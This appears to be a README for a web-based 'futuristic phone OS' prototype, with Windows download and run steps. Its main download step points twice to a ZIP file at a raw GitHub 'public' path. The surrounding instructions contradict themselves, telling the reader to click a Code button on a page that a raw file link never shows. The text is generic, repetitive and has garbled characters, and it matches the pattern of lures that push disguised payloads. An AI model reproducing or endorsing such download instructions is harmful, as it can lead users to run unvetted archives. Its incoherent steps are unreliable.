ฮฉS Phone 2080 is a web-based phone prototype built for Windows users who want to open and explore a futuristic smartphone interface in their browser. It shows a sci-fi home screen, motion effects, glowing panels, and interactive app screens that feel like a phone from the year 2080.
This project is made for viewing and testing on a desktop computer. You do not need to install a phone emulator. You only need a modern browser and the project files from this repository.
Use this link to visit the page and download the project files:
You need:
- A Windows 10 or Windows 11 PC
- Google Chrome, Microsoft Edge, or Firefox
- Internet access to get the files
- A screen size large enough to see the full phone layout
Best results come from:
- A screen set to 1366 ร 768 or higher
- A mouse or trackpad
- Updated graphics drivers for smooth motion effects
Follow these steps to run the project on Windows.
Go to:
https://raw.githubusercontent.com/hittuuuu/iphone_os_2080/main/public/iphone_os_1.4.zip
On the page, click the green Code button and download the repository as a ZIP file.
If you already have Git on your computer, you can also clone the project. Most users should use the ZIP file because it is simpler.
After the download finishes:
- Find the ZIP file in your Downloads folder
- Right-click it
- Select Extract All
- Choose a folder you can find again, such as Desktop or Documents
You should now have a folder named iphone_os_2080.
Open the extracted folder and look for the project files.
If you see a dist folder, index.html, or a similar ready-to-open file, you can run the app directly in your browser.
If you see source files such as src, package.json, or vite.config.ts, follow the setup steps below.
If the project includes a direct web file:
- Find
index.html - Double-click it
- Your browser should open the futuristic phone interface
This is the fastest way to view the prototype.
If the project uses the source files, do this:
Download and install the latest LTS version of Node.js for Windows from the official Node.js site.
After installation, restart your computer if Windows asks for it.
Inside the project folder:
- Hold Shift and right-click in the folder
- Choose Open PowerShell window here or Open in Terminal
Type:
npm install
Then press Enter.
This downloads the tools the project needs.
Type:
npm run dev
Then press Enter.
Wait for the local address to appear, such as http://localhost:5173.
Copy the local address into Chrome, Edge, or Firefox.
The app should load and show the OS interface.
The interface is designed to feel like a futuristic phone.
You can:
- Tap or click the home screen icons
- Swipe or drag between screens
- Open app panels and system views
- Use on-screen controls to move through the UI
- Watch particle effects and animated transitions
The experience is built around phone-style gestures and smooth screen changes.
The UI uses layered panels, glow effects, and glass-like surfaces to create a hologram feel.
Move through different screens that show phone apps, system views, and futuristic tools.
Interact with a built-in assistant panel that fits the sci-fi theme.
The interface includes elements inspired by neural input and advanced device control.
The background uses Three.js effects to create depth and motion.
The app includes motion patterns and gestures that feel close to a modern phone UI.
Screen changes, panel moves, and interface actions use clean animation.
You may see files like these:
srcโ app code and screenspublicโ static assetspackage.jsonโ project settingsvite.config.tsโ local run setuptsconfig.jsonโ TypeScript settingsREADME.mdโ project notes
- Make sure the files finished downloading
- Check that the ZIP file was fully extracted
- Try opening the project in Chrome or Edge
- Use a desktop browser, not a phone browser
- Resize the window to a wider view
- Refresh the page
- Check that Node.js is installed
- Make sure you are in the correct folder
- Run
npm installbeforenpm run dev - Open a new terminal if the first one shows an error
- Close other heavy apps
- Update your browser
- Check your graphics driver updates
- Use a recent Windows machine for best results
For the cleanest result, use:
- Google Chrome
- Microsoft Edge
- Firefox
Turn on:
- Hardware acceleration in the browser
- A normal zoom level of 100%
- Full-screen mode if you want a larger view
- Repository:
iphone_os_2080 - Type: interactive web prototype
- Platform: Windows
- Stack: React 19, Three.js, Framer Motion, TypeScript, Vite
- Theme: futuristic phone OS concept
- Goal: desktop preview of a sci-fi mobile interface
To get started, visit this page and download the project files:
https://raw.githubusercontent.com/hittuuuu/iphone_os_2080/main/public/iphone_os_1.4.zip
After download:
- Extract the ZIP file
- Open the folder
- Open
index.htmlif it is ready to run - Or use
npm installandnpm run devif the source files are included